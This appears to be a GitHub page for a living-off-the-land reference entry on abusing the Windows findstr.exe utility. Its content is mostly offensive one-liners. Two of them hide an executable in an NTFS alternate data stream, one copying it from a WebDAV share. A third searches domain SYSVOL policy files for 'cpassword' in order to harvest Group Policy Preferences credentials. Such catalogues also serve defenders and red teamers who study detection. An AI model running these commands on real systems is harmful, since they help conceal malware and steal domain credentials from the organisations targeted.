Skip to content

Latest commit

 

History

History
33 lines (21 loc) · 683 Bytes

Findstr.md

File metadata and controls

33 lines (21 loc) · 683 Bytes

Findstr.exe

  • Functions: Add ADS, Search
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe    

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe    

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Acknowledgements:

  • Oddvar Moe - @oddvarmoe

Code sample: *

Resources:

Full path:

c:\windows\system32\findstr.exe
c:\windows\sysWOW64\findstr.exe

Notes: Some specific details about the binary file.